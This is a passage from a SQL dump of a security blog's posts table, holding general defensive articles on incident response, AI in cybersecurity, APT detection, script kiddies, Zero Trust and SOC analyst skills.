Foster a Culture of Improvement\n\nTreat every incident and exercise as a learning opportunity. Share findings across teams to ensure everyone is informed and prepared.\n\n---\n\n## Build Resilience with a Strong Incident Response Plan\n\nA well-designed **Incident Response Plan** is essential in today’s cyber landscape. It’s not just a tool for IT teams—it’s a critical part of protecting your business, your customers, and your reputation. With an IRP, you can minimize downtime, reduce costs, and recover faster when faced with cyber threats.\n\nCybersecurity is no longer optional. Whether you’re a business owner or an IT professional, building and refining an IRP is a vital step toward long-term resilience and success. Start today to stay ahead of evolving cyber risks and protect what matters most.', '', 'http://infoseclabs.io/uploads/1767586151372-678797972.png', 'Illustration of a business team executing a cybersecurity incident response plan', 1, 'published', '2026-01-04 23:08:00', '2026-01-05 07:09:23', 'Information Security', 'Essential Cybersecurity: Incident Response Plans', 'Discover why an Incident Response Plan is crucial for protecting your business from cyber threats and minimizing damage.', 'Incident Response Plan'),
(21, 'The Impact of AI on Cybersecurity: Opportunities and Threats', 'the-impact-of-ai-on-cybersecurity-opportunities-and-threats', '# The Impact of Artificial Intelligence on Cybersecurity\n\nArtificial intelligence (AI) is transforming industries across the globe, and cybersecurity is no exception. From enhancing threat detection and response to redefining how we approach online defenses, AI has become a powerful ally. However, it has also created new threats by amplifying the capabilities of cybercriminals.\n\nThis post explores the dual nature of AI within the realm of cybersecurity. You\'ll learn about its opportunities, risks, real-world applications, and the trends shaping its future.\n\n## How AI is Revolutionizing Cybersecurity\n\nCyber threats are more sophisticated and persistent than ever. Traditional, reactive security systems often fall short in detecting and mitigating attacks quickly. Enter AI, which has proven to be a game-changer.\n\nAI in cybersecurity excels at recognizing patterns within enormous datasets, detecting abnormalities, and responding to potential threats with speed and accuracy. It paves the way for smarter, more efficient security protocols, ultimately reshaping how organizations tackle security challenges. 
But as with every powerful tool, AI opens doors for both defenders and attackers.\n\n### Why AI Matters in Cybersecurity\n\n- **Volume of Threats**: Cyber threats are increasing; AI helps organizations tackle this growing challenge efficiently.\n- **Real-time Responses**: AI-driven tools offer proactive rather than reactive measures.\n- **Complexity of Patterns**: Threat detection has evolved beyond detecting \"red flags.\" Machine learning (ML) algorithms recognize complex malicious behavior patterns.\n\n## Opportunities Created by AI in Cybersecurity\n\nAI brings a wealth of opportunities to cybersecurity professionals, giving defensive systems a critical edge.\n\n### Automated Threat Detection\n\nAI can analyze vast amounts of data to identify abnormal patterns in user behavior, network traffic, or application usage. This capability minimizes an organization\'s time-to-detect (TTD) and containment of cyberattacks, which is crucial in reducing damage.\n\n**Example:** AI-driven Security Information and Event Management (SIEM) platforms leverage ML to detect anomalies in real-time. Systems like Elastic Security and IBM QRadar combine ML-based anomaly detection with conventional rule-based correlation, and their detections can be tuned to improve accuracy over time.\n\n### Enhanced Malware Detection\n\nAI’s ability to recognize nuanced patterns means it can help detect previously unseen (\"zero-day\") malware that signature-based tools would miss, although no model catches everything and its false positives still need human triage. Unlike traditional systems requiring rule-based detection, AI tools analyze the behavior of files before they execute, flagging suspicious activity.\n\n### Improved Phishing Protection\n\nPhishing attacks are among the most common cyber threats, and AI plays a vital role in combating them:\n\n- AI tools scan emails for patterns and keywords associated with phishing.\n- Natural language processing (NLP) allows AI to identify tone and wording suggestive of fraudulent emails.\n\n### Faster Incident Response\n\nUsing predictive analytics, AI can suggest remediation measures more quickly than human analysts. 
Automated responses also reduce reliance on manpower, saving organizations time and financial resources.\n\n### Vulnerability Management\n\nAI tools like Tenable.io automate vulnerability scanning, identifying weaknesses before attackers can exploit them. AI continuously learns from data across networks, systems, and endpoints to maintain an up-to-date understanding of organizational threats.\n\n## Threats Posed by AI in Cybersecurity\n\nDespite its promise, AI has a darker side. It introduces threats that are making cybercriminals more dangerous than ever before.\n\n### AI-driven Cyberattacks\n\nAttackers are already leveraging AI to carry out highly targeted and efficient attacks:\n\n- Models trained on leaked password lists generate the most likely candidate passwords first, letting attackers recover weak passwords with far fewer guesses than naive brute force.\n- Malware is evolving: researchers have demonstrated prototypes that use AI to select targets and adapt to anti-malware measures, and generative tools are already being used to produce more convincing phishing lures at scale.\n\n### Deepfake Technology\n\nDeepfakes are AI-generated videos or audio recordings that simulate real people’s appearances or voices. This growing threat can be used for:\n\n- Impersonating executives to facilitate wire fraud (e.g., \"CEO voice scams\").\n- Creating fake videos to spread misinformation or cause reputational harm.\n\n### Exploitation of AI Systems\n\nCybercriminals are turning AI itself into a target:\n\n- They poison the model’s training data (data poisoning) so it learns to produce false positives or negatives, weakening its effectiveness.\n- They craft adversarial examples—inputs with small, deliberate perturbations that cause a model to misclassify them—so that malicious files or traffic evade AI-based detection.\n\n### Weaponization of Data\n\nAI needs massive datasets for training, but these datasets are often sensitive and retrievable. 
Should an attacker gain access, they can exploit or sell this stolen information.\n\n## Real-world Cases of AI in Cybersecurity\n\n### IBM’s Watson for Cybersecurity\n\nIBM Watson uses AI to analyze and interpret thousands of threat reports daily, shortening the time it takes security analysts to interpret threat intelligence and respond.\n\n**Impact:** Reduced threat analysis time and improved security postures for large organizations.\n\n### Google’s Chronicle Backstory\n\nChronicle, a cybersecurity tool by Google, uses AI to parse and correlate data across an organization’s infrastructure. This narrows down potential threats with incredible speed and accuracy.\n\n**Impact:** AI enhances internal threat hunting, detecting behavior that evades standard tools.\n\n### AI-powered Botnets\n\nUnfortunately, automation also empowers attackers, and AI is expected to amplify this. The infamous Mirai botnet is often cited as an AI-powered botnet, but it used no AI at all: it infected IoT devices worldwide by scanning the internet and logging in with a short list of factory-default telnet credentials, then launched massive distributed denial-of-service (DDoS) attacks in 2016.\n\n**Impact:** Highlighted vulnerabilities in IoT devices and showed how much damage simple automation can do against weak default credentials—a capability that AI-assisted tooling is expected to extend further.\n\n## Future Trends in AI and Cybersecurity\n\n### Adaptive Security Systems\n\nWe foresee traditional, static security systems giving way to AI-powered adaptive systems capable of evolving to meet dynamic threats. These systems will detect, analyze, and respond based on real-time scenarios, offering a more resilient defense.\n\n### The Rise of Federated Learning\n\nFederated learning allows AI models to be trained on decentralized datasets without transferring sensitive data. This technique can enhance privacy and widen the data a detector learns from, although federated models remain exposed to poisoning by malicious participants and to gradient-leakage attacks, so it is not a privacy guarantee on its own.\n\n### AI Collaboration\n\nFuture cybersecurity tools will lean on collaborative AI. 
For example, algorithms from multiple organizations may share anonymized data on emerging threats, creating a unified front against cyber criminals.\n\n### Regulation of AI in Cybersecurity\n\nGovernments and regulatory bodies will likely introduce stricter frameworks to govern the ethical and controlled use of AI tools. These regulations will balance innovation with security.\n\n## Strengthening Defenses with AI\n\nThe intersection of AI and cybersecurity is an exciting, high-stakes domain. While AI is a potent enabler of security advancements, it also presents new challenges that must be carefully managed. As we move forward, the collaboration between AI technologies and human expertise will be crucial in fortifying our defenses against cyber threats.', '', 'http://infoseclabs.io/uploads/1767586386191-18351172.png', 'AI-enhanced cybersecurity defense illustration', 1, 'published', '2026-01-05 15:12:00', '2026-01-06 04:37:20', 'Information Security', 'AI\'s Role in Cybersecurity: Opportunities & Threats', 'Explore how AI transforms cybersecurity, enhancing defenses and introducing new risks. Discover its dual impact and future trends.', 'AI cybersecurity'),
(22, 'Security Tool Analyst vs. Security Alerts Without Tools: Which Approach is Best?', 'security-tool-analyst-vs-security-alerts-without-tools-which-approach-is-best', '# Exploring Cybersecurity: Tools vs. Manual Analysis\n\nCybersecurity is a rapidly evolving field where protecting digital assets is critical for organizations of all sizes. With advancements in both threats and defenses, there is often debate over the best approach to security. Should we rely on technology and tools or focus on manual security alert analysis? What approach is more effective for job interviews, and do professionals really need to learn Digital Forensics and Incident Response (DFIR) manually?\n\nThis blog delves into these questions by exploring the roles of security tool analysts, examining the process of handling alerts without tools, and discussing their implications for career development and hiring. Read on to determine which approach aligns with your goals and how best to prepare for the evolving world of cybersecurity.\n\n## What is a Security Tool Analyst?\n\nSecurity tool analysts are professionals who work with software and tools specifically designed to detect, manage, and respond to security threats. 
Their role revolves around leveraging automated systems and platforms, such as:\n\n- SIEM (Security Information and Event Management) solutions\n- EDR (Endpoint Detection and Response) tools\n- Intrusion detection systems\n\nThese tools help analyze logs, monitor suspicious activities, and respond to security incidents efficiently.\n\n### Key Responsibilities of a Security Tool Analyst\n\n- Configuring and maintaining security tools used for threat detection.\n- Monitoring dashboards and analyzing alerts generated by security tools.\n- Investigating flagged incidents to determine their impact and severity.\n- Creating reports based on findings and providing recommendations.\n\nTools such as Splunk, QRadar, and CrowdStrike often form the backbone of their workflow, offering automation and insights critical to modern cybersecurity.\n\n### Advantages of Security Tools\n\n1. **Efficiency**: Tools automate repetitive tasks, allowing analysts to manage larger volumes of data in less time.\n2. **Accuracy**: Many tools detect intricate patterns that may be missed by manual observation, reducing the chance of human error.\n3. **Scalability**: Better suited for handling complex, large-scale networks with continuously growing traffic.\n\nHowever, reliance on tools comes with its challenges, such as overdependence and a potential gap in understanding the deeper technical mechanisms behind alerts.\n\n## Security Alerts Without Tools: A Hands-On Approach\n\nOn the other hand, some cybersecurity professionals believe in adopting manual approaches to monitoring and analyzing security alerts. 
This involves sifting through raw logs, network data, and endpoint activity without the use of advanced software solutions.\n\n### Challenges of Working Without Tools\n\n- **Time-Intensive**: Manually detecting, validating, and responding to alerts takes a significant amount of time.\n- **Prone to Errors**: Relying solely on human judgment can lead to mistakes, especially under time pressure.\n- **Resource-Heavy**: Requires deep expertise and consistent focus to manage alerts effectively.\n\nPractitioners argue that this approach sharpens core skills, builds a better understanding of underlying systems, and helps professionals tackle situations where they don’t have access to tools.\n\n### The Argument for Manual Security Analysis\n\nDespite its challenges, manual analysis provides a solid foundation in cybersecurity concepts. It ensures professionals can work in tool-agnostic environments and allows them to rely on expertise rather than software alone.\n\n## Security Tools vs. Manual Security Alerts\n\nWhen it comes to comparing the two approaches, several factors come into play, including efficiency, accuracy, and usability.\n\n| Factor          | Security Tool Analyst                      | Manual Security Alerts                                 |\n|-----------------|--------------------------------------------|--------------------------------------------------------|\n| **Efficiency**  | Highly efficient, especially for large-scale data. | Time-consuming and less practical for high-volume analysis. |\n| **Accuracy**    | Tools reduce human error but require proper tuning. | Deep understanding of systems minimizes false positives. |\n| **Learning Curve** | Easier to adopt with proper training.        | Requires extensive technical expertise and experience.   |\n| **Scalability** | Easily handles enterprise-level networks.   | Limited by human capacity and resources.                |\n\nIt’s clear that each method has its own strengths and weaknesses. 
For most organizations, the ideal approach is often a combination of both—a reliance on tools to handle efficiency and scale, paired with skilled professionals who can step in when tools fall short.\n\n## What Do Employers Look For in Interviews?\n\nIf you’re preparing for an interview as a security analyst, you may wonder which approach is more valued. The truth is, companies look for a balance between technical proficiency with tools and a foundational understanding of cybersecurity concepts.\n\n### Skills That Stand Out in Interviews\n\n- **Tool Proficiency**: Familiarity with popular platforms like Splunk, Palo Alto, or Elastic Security is almost always a plus.\n- **Problem-Solving**: Hiring managers want to see how you solve problems when tools fail or alerts are ambiguous.\n- **Foundational Knowledge**: A solid grasp of TCP/IP, intrusion detection techniques, and endpoint security matters as much as tool expertise.\n\nApplicants often gain an edge by showcasing their ability to adapt—highlighting how they’ve used tools to solve real-world challenges while demonstrating their capability to analyze security issues manually when needed.\n\n## Do Professionals Need to Learn DFIR Manually?\n\nDigital Forensics and Incident Response (DFIR) plays a critical role in addressing cybersecurity incidents. 
However, a common question is whether it’s essential for professionals to learn DFIR skills manually.\n\n### Pros of Learning DFIR Manually\n\n- **Deeper Insight**: Understanding the \"why\" and \"how\" behind security alerts helps identify patterns and root causes effectively.\n- **Tool Independence**: Professionals who train manually can perform investigations even without pre-configured software.\n- **Troubleshooting Complex Threats**: Manual skills ensure readiness for incidents that may crash or bypass enterprise security tools.\n\n### Cons of Manual DFIR Learning\n\n- **Time-Intensive**: Manual learning takes significant time and commitment, especially for professionals new to the field.', '', 'http://infoseclabs.io/uploads/1767838334749-937001140.jpg', 'Security analyst comparing automated tools with manual alert analysis', 1, 'published', '2026-01-07 21:12:00', '2026-01-08 05:12:23', 'Information Security', 'Security Tools vs Manual Alerts: Best Cyber Approach?', 'Explore the best cybersecurity approach: automated tools or manual alerts. Understand roles, efficiency, and career implications.', 'Cybersecurity Tools'),
(23, 'How Cybersecurity Professionals Can Detect Advanced Persistent Threats (APTs)', 'how-cybersecurity-professionals-can-detect-advanced-persistent-threats-apts', '# Advanced Persistent Threats: A Comprehensive Guide\n\nAdvanced Persistent Threats (APTs) are among the most sophisticated and potentially devastating cyber threats that organizations face today. These stealthy attackers target sensitive data, critical systems, and intellectual property, often remaining undetected for months or even years. For cybersecurity professionals, the ability to detect and remediate APTs is crucial for defending organizational assets.\n\nThis guide provides an in-depth look at how cybersecurity experts can identify APTs within their networks. We\'ll explore the APT lifecycle, proactive detection measures, effective tools, and real-world case studies, equipping you with practical strategies to stay ahead of these advanced threats.\n\n## Understanding Advanced Persistent Threats\n\n### What Are They and Why Are They Significant?\n\nAdvanced Persistent Threats are prolonged, targeted cyberattacks carried out by sophisticated adversaries, often backed by nation-states or highly organized cybercriminal groups. Unlike opportunistic attacks, APTs are meticulously planned and executed, with the primary goal of stealing sensitive information, causing financial loss, or disrupting operations.\n\nWhat distinguishes APTs from other cyber threats is their **persistence** and **stealth**. Attackers work patiently to infiltrate systems, evade detection, and maintain long-term access. This makes them particularly dangerous for organizations reliant on intellectual property, financial systems, or confidential customer data.\n\n### A Perspective on Cost and Risk\n\nAPTs are expensive—not just for attackers but for their victims. 
According to the Ponemon Institute, the average cost of a data breach is now $4.45 million globally, and breaches involving complex APTs often result in even higher costs.\n\nUnderstanding the significance of these threats is the first step toward detection and protection.\n\n## Decoding the APT Lifecycle\n\nTo effectively identify APTs, professionals must first understand their lifecycle. The APT lifecycle generally consists of the following stages:\n\n1. **Reconnaissance**  \n   Attackers gather information about the target organization using open-source intelligence (OSINT), web-based research, and phishing techniques.\n\n2. **Initial Intrusion**  \n   Leveraging spear-phishing emails, zero-day vulnerabilities, or poorly secured credentials, attackers establish their initial entry point.\n\n3. **Lateral Movement**  \n   Once inside the network, attackers explore internal systems, escalate privileges, and establish backdoors to ensure continued access.\n\n4. **Data Exfiltration**  \n   During this phase, attackers identify and extract valuable data, often using encrypted channels to evade detection.\n\n5. **Persistence**  \n   Attackers install additional backdoors or maintain a dormant presence, waiting for the right moment to strike again.\n\nUnderstanding this lifecycle helps security professionals predict attacker behavior and pinpoint potential entry and action points.\n\n## Proactive Measures to Detect APTs\n\n### Establish a Comprehensive Security Framework\n\nOne of the best strategies for detecting APTs is a proactive posture. Consider implementing these foundational measures:\n\n- **Network Segmentation**  \n  Limit attacker mobility by breaking your network into isolated segments. 
Proper segmentation minimizes the damage caused during lateral movement.\n\n- **Behavioral Analysis**  \n  Regularly analyze user and system behavior to identify unusual patterns, such as unauthorized access attempts or unexpected file transfers.\n\n- **Threat Hunting**  \n  Deploy dedicated threat-hunting teams to actively search for indicators of compromise (IoCs) in your network before automated tools do.\n\n### Prioritize Frequent Security Audits\n\nPeriodic vulnerability assessments and penetration testing help identify weak links that could facilitate an APT attack. Regularly updating software and applying patches for known vulnerabilities also decreases entry points for attackers.\n\n## Tools and Technologies for APT Detection\n\nModern cybersecurity teams must leverage advanced tools and technologies to combat APTs. Here are some of the most effective solutions available:\n\n### 1. **Endpoint Detection and Response (EDR)**\n\nEDR tools like CrowdStrike and Carbon Black provide real-time monitoring and response capabilities across endpoints, ensuring early detection of malicious activities.\n\n### 2. **Network Traffic Analysis (NTA)**\n\nSolutions such as ExtraHop and Darktrace use AI and machine learning to monitor network traffic and identify anomalies indicative of APT activity.\n\n### 3. **Security Information and Event Management (SIEM)**\n\nSIEM platforms like Splunk and IBM QRadar aggregate and analyze data from networks, devices, and applications to spot compromise indicators.\n\n### 4. 
**Threat Intelligence Platforms**\n\nTools like Recorded Future and ThreatQuotient provide access to actionable threat intelligence regarding the latest APT tactics, techniques, and procedures (TTPs).\n\nBy integrating these technologies, organizations can detect suspicious behaviors earlier and respond more effectively.\n\n## Incident Response and Remediation Strategies\n\n### Build a Playbook for APT Incidents\n\nEvery security team should have a detailed incident response plan tailored to APT scenarios. Key steps include:\n\n1. **Containment**  \n   Isolate affected systems to prevent lateral movement and further compromise.\n\n2. **Eradication**  \n   Remove malicious files, unauthorized accounts, and backdoors from your network.\n\n3. **Recovery**  \n   Restore systems from secure backups and monitor closely to ensure attackers don’t return.\n\n4. **Post-Incident Review**  \n   Conduct a comprehensive review of the incident to identify gaps in your defenses and improve future response efforts.\n\n### Train and Empower Your Team\n\nContinuous training ensures your cybersecurity team is well-equipped to address modern threats. Focus on simulation exercises and tabletop drills to test incident readiness.\n\n## Case Studies: Real-World Examples of APT Detection\n\nLooking at real-world scenarios can provide valuable insights into APT detection and response.\n\n### 1. 
**APT28 and the DNC Hack**\n\nThe Russian-backed APT28 (Fancy Bear) used spear-phishing emails to infiltrate the Democratic National Committee (DNC) systems, highlighting the importance of vigilance against such sophisticated threats.', '', 'http://infoseclabs.io/uploads/1767838642945-921379380.png', 'Cybersecurity professional analyzing network data to detect APTs', 1, 'published', '2026-01-07 13:17:00', '2026-01-08 05:19:30', 'Information Security', 'Detect Advanced Persistent Threats in Cybersecurity', 'Learn how to identify and combat Advanced Persistent Threats (APTs) to protect your organization\'s sensitive data and systems.', 'Advanced Persistent Threats');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(24, 'How to Defend Your Organization Against Script Kiddies', 'how-to-defend-your-organization-against-script-kiddies', '# Understanding and Defending Against Script Kiddies\n\nCyber threats come in all shapes and sizes, but one often underestimated group of attackers is the script kiddies. Despite their seemingly amateur status, they can wreak havoc on businesses and organizations of all sizes. Understanding who script kiddies are and how they operate is crucial for IT professionals and security leaders looking to safeguard their infrastructures.\n\nThis blog will explore the psychology behind script kiddies, the tools they rely on, signs of an impending attack, and detailed strategies to defend your organization. By the end, you\'ll have a robust understanding of how to proactively secure your systems and educate your team to build a human firewall against this threat.\n\n## What Are Script Kiddies and Why Should You Care?\n\nScript kiddies, or \"skiddies,\" are novice hackers who rely on pre-written scripts or hacking tools created by professional hackers. They don’t always have deep technical knowledge but can still cause significant disruption. Unlike sophisticated threat actors, their motives often range from curiosity and thrill-seeking to bragging rights.\n\nWhile they may lack the technical intelligence of seasoned cybercriminals, script kiddies pose a real threat. They exploit known vulnerabilities in systems, causing data breaches, service interruptions, or defacement of web properties. For businesses, this can mean downtime, financial loss, and damage to reputation.\n\nRemember, while their methods might seem less advanced, underestimating them is a mistake. They\'re opportunistic and relentless, searching for any weak link in your organization.\n\n## Understanding the Script Kiddy Mindset\n\nUnderstanding the motivations and approach of script kiddies is key to defending against them. 
Here\'s what fuels their activities:\n\n- **Thrill and Ego Boost**: Many script kiddies hack for the excitement of breaking into a system or to show off to their peers.\n- **Bragging Rights**: Defacing a website or taking a service offline often serves as a \"badge of honor.\"\n- **Ease of Access**: With a wealth of hacking tools, forums, and guides available online, almost anyone with basic computer knowledge can launch an attack.\n- **Target Preference**: Script kiddies are opportunistic and often target low-hanging fruit—organizations with weak defenses are their ideal victims.\n\nBy understanding these behaviors, you’re already better equipped to anticipate and block their attempts.\n\n## Common Tools and Techniques Used by Script Kiddies\n\nBy knowing what tools they use, you can identify vulnerabilities in your system and preemptively close gaps. Here are some popular approaches and tools commonly employed by script kiddies:\n\n1. **Scanning Tools**: Script kiddies often use automated tools like **Nmap** to scan for vulnerabilities in networks.\n2. **Brute Force Attack Tools**: Tools such as Hydra or John the Ripper are used to crack passwords by trying combinations repeatedly.\n3. **Exploit Kits**: These are pre-packaged kits (like the Metasploit Framework) that allow users to exploit known vulnerabilities in software.\n4. **Denial of Service (DoS) Attacks**: With tools like LOIC (Low Orbit Ion Cannon), script kiddies can overwhelm a server, causing unexpected downtime.\n5. **Social Engineering & Phishing Kits**: They may attempt low-tech approaches like phishing, often relying on kits purchased from underground forums.\n\nRecognizing these tools can help security teams predict likely attack methods and shore up weak points.\n\n## Spotting the Signs of an Impending Script Kiddy Attack\n\nEarly detection is vital to stopping a script kiddy in their tracks. 
Here are some key signs to look for within your network or systems:\n\n- Increased network scanning activity on your firewalls or intrusion detection systems (IDS).\n- Repeated failed login attempts, signaling brute force attacks.\n- Suspicious spikes in traffic, especially targeted at specific endpoints, indicating a potential DoS attack.\n- Emails or messages directing employees to click unknown links or provide credentials (phishing).\n\nMonitoring these anomalies and having alert systems in place can give you an early edge.\n\n## Strengthening Your Defenses Against Script Kiddies\n\n**Proactive security measures** are your first line of defense. Here’s how to bolster your organization’s security posture:\n\n1. **Update and Patch Regularly**: Keep all software and hardware systems updated to close existing vulnerabilities.\n2. **Employ a Strong Firewall and IDS**: Filter out malicious traffic using advanced firewalls and monitor for unusual activity with intrusion detection systems.\n3. **Enforce Strong Password Policies**: Ensure employees use complex, unique passwords and implement multi-factor authentication (MFA) for added security.\n4. **Limit Administrative Access**: Only grant high-level permissions to those who truly need them to minimize damage should an account be compromised.\n5. **Conduct Regular Security Audits**: Regular vulnerability assessments will help identify weak spots before attackers exploit them.\n\nImplementing these steps can make your organization a less attractive target for opportunistic script kiddies.\n\n## Have a Response Plan for When Attacks Occur\n\nPreventive measures are essential, but having an incident response plan ensures your team is ready to act if an attack does occur. 
Here’s what an effective plan should include:\n\n- **Immediate Containment**: Disconnect impacted systems from the network to prevent further damage.\n- **Root Cause Analysis**: Investigate the entry point and methods used to strengthen defenses going forward.\n- **Communication Protocols**: Notify stakeholders, employees, or customers if their data or services are affected.\n- **Recovery and Evaluation**: Restore systems from clean backups and ensure the vulnerabilities exploited during the attack are patched.\n\nTesting and updating your incident response plan helps your organization stay prepared for real-world scenarios.', '', 'http://infoseclabs.io/uploads/1767838758067-532321751.png', 'Cybersecurity professional defending against script kiddie attacks', 1, 'published', '2026-01-07 21:18:00', '2026-01-08 05:19:21', 'Information Security', 'Defend Against Script Kiddies: Essential Strategies', 'Learn how to protect your organization from script kiddies with effective strategies and insights into their tactics.', 'script kiddies'),
(25, 'What is Zero Trust Security, and Why Does It Matter?', 'what-is-zero-trust-security-and-why-does-it-matter', '# Understanding the Shift to Zero Trust Security\n\nCyber threats are evolving at an unprecedented pace, with bad actors finding new ways to infiltrate even the most secure networks. To tackle this, organizations are shifting away from traditional perimeter-based defenses and adopting a more robust, modern approach to security known as **Zero Trust**.\n\nBut what exactly is Zero Trust Security, and why is it becoming the gold standard for protecting sensitive information? This blog will break down the core principles of Zero Trust, its benefits, and how your organization can implement it effectively to safeguard its data and operations.\n\n## What is Zero Trust Security?\n\nZero Trust Security is a cybersecurity model built on the principle of \"never trust, always verify.\" Unlike traditional models that assume everything inside the network is trustworthy, Zero Trust treats every user, device, and application as a potential threat until proven otherwise.\n\nThis approach is particularly crucial as businesses increasingly adopt remote work, cloud computing, and IoT devices, creating complex environments where traditional security measures can fall short. Zero Trust ensures that access to systems and data is tightly controlled and monitored, reducing the risk of breaches.\n\n### Why is Zero Trust Important?\n\nThe rise of sophisticated cyberattacks, like ransomware and supply chain breaches, highlights the need for a proactive security stance. According to IBM\'s Cost of a Data Breach Report 2023, the average cost of a data breach has reached a staggering $4.45 million. 
Zero Trust addresses these challenges by adapting to the modern threat landscape and focusing on the following priorities:\n\n- Securing remote workforces and cloud-based environments.\n- Protecting against insider threats.\n- Reducing the attack surface for cybercriminals.\n\n## Core Principles of Zero Trust Security\n\nTo adopt a Zero Trust framework, organizations must align with its core principles. Below, we explore the foundational tenets of this model.\n\n### 1. Least Privilege Access\n\nOne of the fundamental principles of Zero Trust is granting users and devices the minimum level of access required to perform their tasks. By limiting access, Zero Trust mitigates the damage caused by compromised accounts or insider threats. For example, an HR employee may have access to payroll systems but not operational controls for cloud servers.\n\n**Tip**: Implement role-based access control (RBAC) to manage permissions effectively.\n\n### 2. Verify, Don\'t Trust\n\nZero Trust requires continuous verification of all users and devices attempting to access resources, even if they are already inside the network. Authentication mechanisms such as multi-factor authentication (MFA) ensure users are who they claim to be.\n\n**Example**: Even if an employee accesses the corporate network through a VPN, they\'ll still need to verify their identity when accessing critical applications like CRM software.\n\n### 3. Microsegmentation\n\nMicrosegmentation involves dividing networks into smaller, secure zones to limit unauthorized access. Think of it as breaking your network into \"rooms,\" where only authorized users can enter specific areas. This drastically reduces an attacker\'s ability to move laterally within the system.\n\n**Use Case**: Finance databases and marketing data exist in separate network segments to ensure that even if one is compromised, the other remains unaffected.\n\n### 4. Assume Breach\n\nZero Trust operates under the assumption that breaches are inevitable. 
This paradigm shifts focus from breach prevention alone to rapid detection, containment, and recovery. Strategies like advanced threat detection and real-time monitoring support this principle.\n\n**Implementation Tip**: Use tools like Security Information and Event Management (SIEM) and Endpoint Detection and Response (EDR) for enhanced visibility and incident response.\n\n## Benefits of Zero Trust Security\n\nZero Trust is not just a buzzword — it delivers tangible benefits crucial for modern enterprises. Here’s how adopting Zero Trust can bolster your organization’s defenses:\n\n### 1. Reduces the Attack Surface\n\nBy requiring continuous verification and tightly controlling access, Zero Trust minimizes the number of vulnerable entry points for attackers. This is especially important for companies operating in distributed environments with remote employees and hybrid clouds.\n\n### 2. Improves Threat Detection\n\nWith real-time monitoring and analytics, Zero Trust systems can identify unusual patterns and potential threats more effectively. Instead of relying on perimeter defenses, it emphasizes visibility across every layer of the IT ecosystem.\n\n### 3. Protects Against Insider Threats\n\nInsider threats, whether intentional or accidental, remain a significant risk. By restricting access and enforcing granular controls, Zero Trust ensures that no single user has unchecked access.\n\n**Statistic**: According to a report by Verizon, 19% of breaches in 2023 involved insider threats. Zero Trust directly addresses this issue.\n\n### 4. Strengthens Regulatory Compliance\n\nRegulations such as GDPR, HIPAA, and CCPA demand strict data protection measures. Zero Trust frameworks simplify compliance by providing comprehensive activity logging, encryption, and access control measures.\n\n### 5. Enhances User Experience\n\nWhile Zero Trust may sound rigid, its use of technologies like Single Sign-On (SSO) and MFA balances security with user convenience. 
Employees can securely access the resources they need without constant disruptions.\n\n## A Simplified Roadmap to Zero Trust Implementation\n\nImplementing Zero Trust may seem overwhelming, but with a deliberate approach, businesses can reap its rewards. Here\'s a step-by-step roadmap to get started:\n\n### Step 1. Evaluate Your Current Security Posture\n\nBegin by assessing your existing security framework. Identify assets (data, systems, devices), potential vulnerabilities, and privileged access points. This step helps you understand where to focus your efforts.\n\n### Step 2. Adopt Identity and Access Management (IAM)\n\nDeploy tools like MFA, SSO, and user identity verification solutions. Establish RBAC to ensure each employee only has access to necessary applications and data.\n\n- **Tool Example**: Okta or Microsoft Azure AD for IAM implementation.\n\n### Step 3. Segment Your Network\n\nIntroduce microsegmentation to create secure network zones. Use firewalls, virtual LANs (VLANs), or cloud-native security tools to isolate sensitive data and systems.\n\n### Step 4. Enforce Continuous Monitoring and Analytics\n\nImplement monitoring tools that provide real-time insights and raise alerts in the presence of anomalies. Advanced analytics can proactively identify potential risks.\n\n- **Recommended Tools**: SIEM platforms like Splunk or IBM QRadar.\n\n### Step 5. Pilot and Iterate\n\nStart small by applying Zero Trust to a single department or system. Gather feedback, assess the results, and scale based on lessons learned.\n\n### Step 6. Educate and Communicate\n\nZero Trust is not a \"set-it-and-forget-it\" model. Continuous employee training and communication are necessary to sustain your framework’s effectiveness.\n\n## Securing the Future with Zero Trust\n\nThe cyber threat landscape is constantly evolving, and outdated security models can no longer keep pace. 
Zero Trust Security offers businesses and IT leaders a proactive, modern solution to safeguard data, users, and systems in today’s complex environments.', '', 'http://infoseclabs.io/uploads/1767841056902-416013144.png', 'Illustration of a secure digital network representing Zero Trust principles', 1, 'published', '2026-01-07 21:57:00', '2026-01-08 05:57:37', 'Information Security', 'Zero Trust Security: A New Standard in Cyber Defense', 'Discover why Zero Trust Security is essential for safeguarding data in today\'s complex cyber landscape.', 'Zero Trust Security'),
(26, 'Top 10 Things Every SOC Analyst Should Know Inside Out', 'top-10-things-every-soc-analyst-should-know-inside-out', '# The Essential Skills for a SOC Analyst\n\nThe role of a Security Operations Center (SOC) Analyst demands vigilance, adaptability, and expertise. A SOC Analyst is the frontline defender in an organization\'s cybersecurity, tasked with monitoring, analyzing, and responding to potential threats before they escalate. What sets an exceptional SOC Analyst apart from a proficient one is a blend of core cybersecurity knowledge and practical, hands-on skills.\n\nWhether you\'re just starting your cybersecurity career or looking to deepen your expertise, this guide outlines the top 10 things every SOC Analyst should know. These essentials form the foundation of defending against cyberattacks and navigating the complex digital threat landscape.\n\n## 1. Master Networking Fundamentals\n\nA sound understanding of network operations is crucial for effectively detecting and mitigating cyber threats. SOC Analysts should have in-depth knowledge of foundational networking concepts, including:\n\n- **TCP/IP Protocol Suite**: Understanding IP addressing, packets, and how data moves across networks.\n- **OSI Model**: Knowing the seven layers of networking (physical, data link, network, transport, session, presentation, application) to identify vulnerabilities and pinpoint network issues.\n- **Subnetting**: Recognizing how subnetting divides large networks into smaller segments to enhance security and efficiency.\n- **Common Ports and Protocols**: Recognizing unusual use of ports (e.g., HTTP on port 80, HTTPS on port 443, FTP on port 21) can signal potential breaches.\n\nThis knowledge allows analysts to uncover anomalies in their environments while confidently troubleshooting network issues.\n\n## 2. Understand Security Principles\n\nTo effectively secure systems, an analyst must grasp fundamental security principles. 
